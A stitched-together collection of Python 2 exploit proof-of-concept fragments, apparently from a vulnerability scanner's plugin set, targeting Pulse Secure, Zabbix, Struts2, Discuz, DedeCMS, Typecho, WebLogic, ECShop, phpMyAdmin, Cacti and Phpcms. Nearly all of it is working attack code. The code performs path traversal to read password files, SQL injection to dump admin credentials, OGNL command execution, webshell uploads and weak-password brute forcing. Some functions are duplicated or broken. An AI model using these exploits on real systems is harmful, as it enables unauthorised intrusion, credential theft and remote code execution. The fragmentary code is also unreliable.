def get_user_password(self):
payload_palntext_passwd = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?" \
"/dana/html5acc/guacamole/"
payload_user_hash = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/system?" \
"/dana/html5acc/guacamole/"
headers = {
"User-Agent": "Mozilla/5.0",
"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "close",
"Upgrade-Insecure-Requests": "1"
}
try:
plantextpasswd = req.get(self.url + payload_palntext_passwd,
verify=False,
headers=headers,
timeout=(10, 15)).text
except Exception as e:
plantextpasswd = ''
try:
userhash = req.get(self.url + payload_user_hash,
verify=False,
headers=headers,
timeout=(10, 15)).text
except Exception as e:
userhash = ''
return plantextpasswd, userhash
def _verify(self):
try:
result = {}
headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0'}
payload = "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999 or updatexml(1,concat(0x7e,(select substr(concat(surname),1,31) from users limit 0,1)),0)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
att_url = self.url + payload
response = req.get(att_url,headers=headers,timeout=10)
#获取用户名
info_name = re.search(r'\[XPATH syntax error: \'~(.*?)\'\]',response.content)
#获取密码
payload = "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999 or updatexml(1,concat(0x7e,(select substr(concat(passwd),1,31) from users limit 0,1)),0)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
att_url = self.url + payload
response = req.get(att_url,timeout=10)
info_pwd = re.search(r'\[XPATH syntax error: \'~(.*?)\'\]',response.content)
payload = "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999 or updatexml(1,concat(0x7e,(select substr(concat(passwd),32,32) from users limit 0,1)),0)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
att_url = self.url + payload
response = req.get(att_url,timeout=10)
info_pwd_end = re.search(r'\[XPATH syntax error: \'~(.*?)\'\]',response.content)
if info_name and info_pwd and info_pwd_end:
username = info_name.group(1)
password = info_pwd.group(1) + info_pwd_end.group(1)
result['DBInfo'] = {}
result['DBInfo']['Username'] = username
result['DBInfo']['Password'] = password
except Exception:
pass
return self.parse_attack(result)
def strust2_037(self,url):
result = {}
proxies = {
# 'http':'http://127.0.0.1:8081',
# 'https':'http://127.0.0.1:8081',
}
payload = '/(%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=echo vulnerable'
vul_url = url + payload
r = req.get(url=vul_url, allow_redirects=False, proxies=proxies,verify=False)
output = r.content
print output
if 'vulnerable' in output:
exp = '/(%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=whoami'
exp_url = url + exp
r = req.get(url=exp_url, allow_redirects=False, proxies=proxies,verify=False)
output = r.content
print output
if 'cmd=whoami' not in output:
#print u"存在漏洞"
result['VerifyInfo'] = {}
result['name'] = 'strust2_037'
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Payload'] = payload
else:
result = {}
result = {}
return result
def TestingCms(self, url):
dedehash = [
"/data/admin/ver.txt", "/data/admin/allowurl.txt",
"/data/index.html", "/data/js/index.html",
"/data/mytag/index.html", "/data/sessions/index.html",
"/data/textdata/index.html", "/dede/action/css_body.css",
"/dede/css_body.css", "/dede/templets/article_coonepage_rule.htm",
"/include/alert.htm", "/member/images/base.css",
"/member/js/box.js", "/php/modpage/readme.txt",
"/plus/sitemap.html", "/setup/license.html", "/special/index.html",
"/templets/default/style/dedecms.css",
"/company/template/default/search_list.htm"
]
for hashone in dedehash:
try:
dedehashone = url + hashone
r = req.get(dedehashone, timeout=8)
if r.status_code == 200:
# print 'check cms is ok'
dedehashone = url + '/' + hashone[1].upper() + hashone[2:]
r = req.get(dedehashone, timeout=8)
if r.status_code == 200:
# print 'check os is ok'
if self.GetBackUp(self.url) == 1:
# print 'check short is ok'
return 1
else:
break
else:
break
except:
return 0
return 0
def _verify(self):
result = {}
user_list = ['root', 'admin']
password_list = ['root', '123456', '12345678', 'password', 'passwd', '123']
target_url = ''
try:
response = req.get(self.url)
if 'phpMyAdmin' in response.content and '用户名' in response.content:
target_url = str(self.url) + "/index.php"
else:
response = req.get(self.url + '/phpmyadmin/index.php')
if 'input_password' in response.content and 'name="token"' in response.content:
target_url = self.url + "/phpmyadmin/index.php"
except Exception as e:
print e
for user in user_list:
for password in password_list:
try:
result = self._netreq(target_url, user, password)
if result:
print "result=>",result
return self.parse_output(result)
except Exception as e:
print e
return self.parse_output(result)
def get_current_work_path(host):
geturl = host + "/ws_utc/resources/setting/options/general"
ua = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0'
}
values = []
try:
resp = req.get(geturl)
if resp.status_code == 404:
exit("[-] {} don't exists CVE-2018-2894".format(host))
elif "Deploying Application".lower() in resp.text.lower():
print("[*] First Deploying Website Please wait a moment ...")
time.sleep(20)
resp = req.get(geturl, headers=ua)
if "</defaultValue>" in resp.content:
root = ET.fromstring(resp.content)
value = root.find("section").find("options")
for e in value:
for sub in e:
if e.tag == "parameter" and sub.tag == "defaultValue":
values.append(sub.text)
except req.ConnectionError:
exit("[-] Cannot connect url: {}".format(geturl))
if values:
return values[0]
else:
print("[-] Cannot get current work path\n")
exit(resp.content)
def _attack(self):
result = {}
###
#!!!!The ssrf_url is one file i put it in discuz for test.
#!!!!One day you find the real ssrf in discuz you can change the ssrf_url to work well;
###
ssrf_url = "ssrf_gopher.php?ssrf="
payload = ('gopher://127.0.0.1:6379/'\
'_eval "local t=redis.call(\'keys\',\'*_setting\');'\
'for i,v in ipairs(t) do redis.call(\'set\',v,'\
'\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'\
'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'\
's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'\
'a:1:{s:7:\\\"plugins\\\";s:34:\\\"eval(base64_decode(\$_REQUEST[a]));\\\";}}}'\
's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'\
' end;return 1;" 0 %250D%250Aquit')
#
tmpparse = urlparse.urlparse(self.url)
if tmpparse.path != '':
self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' + tmpparse.path.split('/')[1]
#self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' +(tmpparse.path.split('/')[1],tmpparse.path.split('/')[0])['/' in tmpparse.path]
else:
self.url = tmpparse.scheme + '://'+ tmpparse.netloc
vul_url = self.url + '/' + ssrf_url + payload
base_rep = req.get(vul_url)
print base_rep.status_code
while base_rep.status_code == 200:
shell_url = self.url + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
print shell_url
rep = req.get(shell_url)
if rep.status_code == 200:
shell_payload = 'file_put_contents("shell.php","<?php @eval(\$_REQUEST[c1tas]);?>");phpinfo();'
shell_payload_b64 = base64.b64encode(shell_payload)
attack_url= shell_url + '&a=' + shell_payload_b64
req.get(attack_url)
flag = "phpinfo";
shell_url = self.url + '/' + 'shell.php'
verify_url = shell_url + "?c1tas=phpinfo();"
rep = req.get(verify_url)
if rep.status_code == 200 and flag in rep.content:
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = shell_url
result['ShellInfo']['Content'] = '@eval($_REQUEST[c1tas]);'
payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
recover_url = self.url + '/' +ssrf_url +payload_flush
req.get(recover_url)
req.get(self.url + '/forum.php')
break
return self.parse_output(result)
def _attack(self):
result = {}
target = self.url + '/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=32&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=61&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=64&arrs2[]=102&arrs2[]=111&arrs2[]=112&arrs2[]=101&arrs2[]=110&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=97&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=119&arrs2[]=114&arrs2[]=105&arrs2[]=116&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=119&arrs2[]=93&arrs2[]=41&arrs2[]=32&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=102&arrs2[]=117&arrs2[]=99&arrs2[]=107&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=99&arrs2[]=108&arrs2[]=111&arrs2[]=115&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35'
req.get(target)
req.get(self.url + '/plus/ad_js.php?aid=1&nocache=1')
shell = req.get(self.url + '/plus/x.php')
if shell.content.find('w'):
result = {'VerifyInfo': {}}
result['VerifyInfo']['shell'] = self.url + '/plus/x.php'
result['VerifyInfo']['password'] = '******'
return self.parse_result(result)
def _attack(self):
result = {}
###
#!!!!The ssrf_url is one file i put it in discuz for test.
#!!!!One day you find the real ssrf in discuz you can change the ssrf_url to work well;
###
ssrf_url = "ssrf_gopher.php?ssrf="
payload = ('gopher://127.0.0.1:6379/'\
'_eval "local t=redis.call(\'keys\',\'*_setting\');'\
'for i,v in ipairs(t) do redis.call(\'set\',v,'\
'\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'\
'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'\
's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'\
'a:1:{s:7:\\\"plugins\\\";s:34:\\\"eval(base64_decode(\$_REQUEST[a]));\\\";}}}'\
's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'\
' end;return 1;" 0 %250D%250Aquit')
#
tmpparse = urlparse.urlparse(self.url)
if tmpparse.path != '':
self.url = tmpparse.scheme + '://' + tmpparse.netloc + '/' + tmpparse.path.split(
'/')[1]
#self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' +(tmpparse.path.split('/')[1],tmpparse.path.split('/')[0])['/' in tmpparse.path]
else:
self.url = tmpparse.scheme + '://' + tmpparse.netloc
vul_url = self.url + '/' + ssrf_url + payload
base_rep = req.get(vul_url)
print base_rep.status_code
while base_rep.status_code == 200:
shell_url = self.url + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
print shell_url
rep = req.get(shell_url)
if rep.status_code == 200:
shell_payload = 'file_put_contents("shell.php","<?php @eval(\$_REQUEST[c1tas]);?>");phpinfo();'
shell_payload_b64 = base64.b64encode(shell_payload)
attack_url = shell_url + '&a=' + shell_payload_b64
req.get(attack_url)
flag = "phpinfo"
shell_url = self.url + '/' + 'shell.php'
verify_url = shell_url + "?c1tas=phpinfo();"
rep = req.get(verify_url)
if rep.status_code == 200 and flag in rep.content:
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = shell_url
result['ShellInfo']['Content'] = '@eval($_REQUEST[c1tas]);'
payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
recover_url = self.url + '/' + ssrf_url + payload_flush
req.get(recover_url)
req.get(self.url + '/forum.php')
break
return self.parse_output(result)
def check_shell(url, verifycode):
shell_url = url + '/{}.php'.format(verifycode)
r = req.get(shell_url)
if r.status_code == 200 and hashlib.md5(
verifycode).hexdigest() in r.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = urljoin(
self.url, "/{}.php".format(verifycode))
req.get(
urljoin(
self.url, "/{}.php?cmd=rm -rf {}.php".format(
verifycode, verifycode)))
def _attack(self):
result = {}
url_part = self.url.rpartition('/')
payload = (
'gopher://127.0.0.1:6379/xeval '
'"local t=redis.call(\'keys\',\'*_setting\');'
'for i,v in ipairs(t) do redis.call(\'set\',v,'
'\'a:2:{s:6:\\"output\\";a:1:{s:4:\\"preg\\";'
'a:2:{s:6:\\"search\\";a:1:{s:7:\\"plugins\\";'
's:5:\\"/^./e\\";}s:7:\\"replace\\";a:1:{s:7:\\"plugins\\";'
's:40:\\"system(base64_decode($_GET[dshtanger]));\\";}}}'
's:13:\\"rewritestatus\\";a:1:{s:7:\\"plugins\\";i:1;}}\') end;'
'return 1;" 0 %250D%250Aquit')
target_url = self.url + payload
vul_rep = req.get(target_url)
while vul_rep.status_code == 200:
shell_url = url_part[
0] + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
shell_rep = req.get(shell_url)
if shell_rep.status_code == 200:
random_sed = string.letters + string.digits
flag = ''.join([random.choice(random_sed) for _ in range(8)])
shell_flag = ''.join(
[random.choice(random_sed) for _ in range(8)])
#use system() write a shell php file and shell will retained after flushing redis apache
shell_payload = 'echo \'<?php @eval($_POST[dshtanger]);echo "' + flag + '";?>\' > ' + shell_flag + '.php'
shell_payload_b64 = base64.b64encode(shell_payload)
#write a random php file
req.get(shell_url + '&dshtanger=' + shell_payload_b64)
#access this php file
verify_url = url_part[0] + '/' + shell_flag + '.php'
verify_rep = req.get(verify_url)
if (verify_rep.status_code == 200) and (flag
in verify_rep.content):
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = verify_url
result['ShellInfo'][
'Content'] = '@eval($_POST[dshtanger]);'
#recover website
flush_payload = 'gopher://127.0.0.1:6379/xflushall%0D%0Aquit'
flush_url = self.url + flush_payload
req.get(flush_url)
test_url = url_part[0] + '/forum.php'
req.get(test_url)
break
return self.parse_output(result)
def _verify(self, verify=True):
vul_url = self.url
result = {}
headers = req.get(vul_url, timeout=10).headers
file_len = headers["Content-Length"]
headers = {
"Range":
"bytes=-{},-9223372036854{}".format(
int(file_len) + 623, 776000 - (int(file_len) + 623))
}
r = req.get(vul_url, headers=headers)
if r.status_code == 206 and "Content-Range" in r.content:
result['desc'] = "Vuln url"
return self.parse_attack(result)
def _verify(self):
'''verify mode'''
vul_url = self.url
proto, rest = urllib.splittype(vul_url)
host, rest = urllib.splithost(rest)
host, port = urllib.splitport(host)
result = {}
if port is None:
vul_url = self.url + ":8888"
target = vul_url + "/foo/default/master/..%252F..%252F..%252F..%252Fetc%252fpasswd"
response_code = req.get(target).status_code
r = req.get(target)
if response_code == 200 and "bin" in r.text and "/usr/sbin" in r.text and "root" in r.text:
result['VerifyInfo'] = "success"
pass
return self.parse_output(result)
def _attack(self):
try:
result = {}
#获取表前缀
table_pre = self.get_table_pre(self.url)
if table_pre is None:
return self.parse_attack(result)
#获取url
data = "respond.php?code=alipay&subject=0&out_trade_no=%00' union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(CHAR(126),CHAR(126),CHAR(126),user_name,CHAR(124),CHAR(124),CHAR(124),password,CHAR(126),CHAR(126),CHAR(126)) from {table_pre}_admin_user limit 1))a from information_schema.tables group by a)b%23".format(
table_pre=table_pre)
url = self.get_standard_url(data, self.url)
pattern = re.compile(r"~~~(\w+?)\|\|\|(\w+?)~~~")
for i in range(10):
r = req.get(url)
re_result = pattern.findall(r.content.decode(r.encoding))
if re_result:
result['AdminInfo'] = {}
result['AdminInfo']['Username'] = re_result[0][0]
result['AdminInfo']['Password'] = re_result[0][1]
return self.parse_attack(result)
return self.parse_attack(result)
except:
import traceback
traceback.print_exc()
def _attack(self):
#定义返回结果
result = {}
header = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0",
"Referer": self.url
}
payload = "YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6NDp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMjoiAFR5cGVjaG9fRmVlZABfY2hhcnNldCI7czo1OiJVVEYtOCI7czoxOToiAFR5cGVjaG9fRmVlZABfbGFuZyI7czoyOiJ6aCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NjM6ImZpbGVfcHV0X2NvbnRlbnRzKCd3ZWJzaGVsbC5waHAnLCAnPD9waHAgQGV2YWwoJF9QT1NUW3AwXSk7Pz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6NzoidHlwZWNobyI7fQ=="
data = {
"__typecho_config":payload
}
#获取漏洞url
vul_url = '%s' % self.url
#获取处理后的url
vul_url = self.url+"/install.php?finish=a"
res = req.post(vul_url,headers=header,data=data)
status = req.get(self.url+"/webshell.php").status_code
if status == 200:
result['VerifyInfo']={}
result['VerifyInfo']['URL']=self.url+"/webshell.php"+"--->Password:P0"
result['VerifyInfo']['Payload']=data
return self.save_output(result)
def _verify(self):
# 调用指纹方法
result = {}
#如果设置端口则取端口,没有设置则为默认端口
import re
vul_url = "%s" % self.url
# from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else:
_host = url2ip(vul_url)
_port = "7001"
vul_ip = "http://%s:%s/ws_utc/config.do" % (_host, _port)
try:
response = req.get(url=vul_ip, timeout=5,
allow_redirects=False) #禁止重定向
if (response.status_code == 200 and "WSDL" in response.text):
url = "/ws_utc/resources/setting/keystore"
target = "http://%s:%s/" % (_host, _port)
response = upload_webshell(target, url)
if (response != ""):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_ip
result['VerifyInfo']['Payload'] = response
return self.save_output(result)
except Exception as e:
print e
pass
return self.save_output(result)
def _verify(self):
"""verify mode"""
result = {}
random1 = random.randint(999, 9999)
random2 = random.randint(999, 9999)
random3 = random1 * random2
spliturl = self.url.split('/')
targetUrl = spliturl[-1]
targetUrl = '${{{0}*{1}}}'.format(random1, random2) + "/" + targetUrl
finalUrl = "http://"
for i in range(1, len(spliturl) - 1):
if spliturl[i] != '':
finalUrl = finalUrl + spliturl[i] + "/"
finalUrl = finalUrl + targetUrl
#print finalUrl
matchstring = str(random3)
#print random3
try:
resp = req.get(finalUrl, allow_redirects=False)
#print resp.headers
if matchstring in resp.headers['location'].lower():
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
except:
pass
return self.parse_output(result)
def _verify(self):
#定义返回结果
result = {}
#获取定义请求头
import random
seed = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
sa = []
for i in range(8):
sa.append(random.choice(seed))
salt = ''.join(sa)
headers = {
'Host': salt,
'User-agent': salt,
'X-Forwarded-For': salt,
'cookie': salt,
}
proxies = {
# 'http': 'http://127.0.0.1:8080',
# 'https': 'http://127.0.0.1:8080',
}
try:
response = req.get(url=self.url,
headers=headers,
timeout=5,
proxies=proxies)
except Exception, e:
response = ""
def _verify(self):
#定义返回结果
result = {}
#获取漏洞url
vul_url = '%s' % self.url
print vul_url
if vul_url[-1] == '/':
vul_url = vul_url[:-1]
print vul_url
#定义漏洞列表
# payload_url = []
# payload_content = []
payload_dict = {}
final_url = []
#循环判断
for file in self.filelist:
targetURL = vul_url + file
#print vul_url + file
try:
r = req.get(url=targetURL, timeout=1,allow_redirects=False) #禁止重定向
r_text = r.text
if r.status_code == 200:
payload_dict[targetURL] = r_text
# payload_url.append(targetURL)
# payload_content.append(r_text)
except Exception,e:
print "error",e,targetURL
def _verify(self):
result = {}
url = self.url + "/index.php?m=member&c=index&a=register&siteid=1"
username = randomStr(6)
password = randomStr(6, '1234567890')
data = {
"siteid": "1",
"modelid": "1",
"username": "******" % (username),
"password": "******" % (password),
"email": "*****@*****.**" % (username),
"info[content]":
"<img src=http://pocsuite.org/include_files/php_attack.txt?.php#.jpg> ",
"dosubmit": "1",
"protocol": "",
}
match = "img src=(.+?)(/[0-9]{4}/[0-9]{4}/)([0-9]+?).php"
resp = req.post(url, data=data)
shell = re.findall(match, resp.text)
shellinfo = ''.join(shell[0]) + ".php"
if shell:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
shell_resp = req.get(shellinfo)
if shell_resp.status_code == 200:
result['VerifyInfo']['webshell'] = shellinfo
return self.parse_attack(result)
def _verify(self):
result = {}
self.raw_url = self.url
host = urlparse.urlparse(self.url).hostname
port = urlparse.urlparse(self.url).port
scheme = urlparse.urlparse(self.url).scheme
if port is None:
port = "80"
else:
port = str(port)
if "https" == scheme:
self.url = "%s://%s" % (scheme, host)
else:
self.url = "%s://%s:%s" % (scheme, host, port)
paylaod = "/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/"
headers = {"User-Agent": "Mozilla/5.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close",
"Upgrade-Insecure-Requests": "1"}
try:
res = req.get(self.url + paylaod, verify=False, headers=headers, timeout=(10, 15))
if "root:x:0:0:root" in res.text and res.status_code == 200:
result["VerifyInfo"] = {}
result["VerifyInfo"]["URL"] = self.url
result["VerifyInfo"]["passwd"] = res.text
result["VerifyInfo"]["host"] = self.get_hosts()
except Exception as e:
pass
return self.parse_output(result)
def _verify(self):
try:
result = {}
headers = {
'Referer':
'''554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}'''
}
att_url = self.url + "/user.php?act=login"
response = req.get(att_url, headers=headers, timeout=10)
res = req.get(self.url + "/1.php", timeout=10)
if res.status_code == 200:
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = self.url + "/1.php"
except Exception, e:
pass
def _netreq(self, target_url, username, password):
result = {}
flag_list = ['src="navigation.php', 'frameborder="0" id="frame_content"', 'id="li_server_type">',
'class="disableAjax" title=']
for _ in range(10):
res = req.get(url = target_url)
set_session = re.findall(r"name=\"set_session\" value=\"(.*?)\" \/", res.text)[0]
token = re.findall(r"name=\"token\" value=\"(.*?)\" \/", res.text)[0]
cookie = ''
for x,y in res.cookies.get_dict().items():
cookie = cookie + "{}={};".format(x,y)
header = {
"Content-Type":"application/x-www-form-urlencoded",
"Cookie": cookie
}
payload = {
"set_session": set_session,
"pma_username": username,
"pma_password": password,
"server": "1",
"target": "index.php",
"token": token
}
payload = urllib.urlencode(payload)
response = req.post(url = target_url, data=payload, headers=header)
for flag in flag_list:
if flag in response.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
result['VerifyInfo']['Payload'] = payload
return result
return result
def vul_check(payload):
url = urlparse.urljoin(base_url, payload)
sock = socket.socket()
sock.connect(("127.0.0.1", 8080))
sock.send('GET /{} HTTP/1.0\r\n'.format(payload).encode('ascii'))
sock.send('Host: 127.0.0.1\r\n'.encode('ascii'))
sock.send('\r\n'.encode('ascii'))
str_five = 'testssdfsf' * 200
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.send(str_five.encode('ascii'))
sock.close()
get_verify_str = req.get(verify_url)
return get_verify_str
def _verify(self):
result = {}
payload = '/plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=\
&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=\
&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=\
Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7'
vulurl = self.url + payload
verurl = self.url + '/plugins/weathermap/configs/test.php'
req.get(vulurl)
req_ver = req.get(verurl)
if req_ver.status_code == 200 and '46ea1712d4b13b55b3f680cc5b8b54e8' in req_ver.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = payload
return self.parse_attack(result)
def upload_webshell(host, uri):
set_new_upload_path(host, get_new_work_path(host))
upload_content = "POC test"
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'X-Requested-With': 'XMLHttpRequest',
}
files = {
"ks_edit_mode": "false",
"ks_password_front": "test",
"ks_password_changed": "true",
"ks_filename": ("test.jsp", upload_content)
}
resp = req.post(host + uri, files=files)
response = resp.text
match = re.findall("<id>(.*?)</id>", response)
if match:
tid = match[-1]
shell_path = host + "/ws_utc/css/config/keystore/" + str(
tid) + "_test.jsp"
if upload_content in req.get(shell_path, headers=headers).content:
print shell_path
return True
else:
return False
else:
return False
def _verify(self):
#定义返回结果
result = {}
#获取漏洞url
vul_url = '%s' % self.url
from urlparse import urlparse, urlunparse, urljoin
urlinfo = urlparse(vul_url)
check_url = urlunparse(
(urlinfo.scheme, urlinfo.netloc, '/', '', '', ''))
#print check_url
payload_dict = {}
final_url = []
for fckurl in self.fckdir:
targetURL = urljoin(check_url, fckurl)
#print targetURL
try:
r = req.get(url=targetURL, timeout=1,
allow_redirects=False) #禁止重定向
# print targetURL,r.status_code
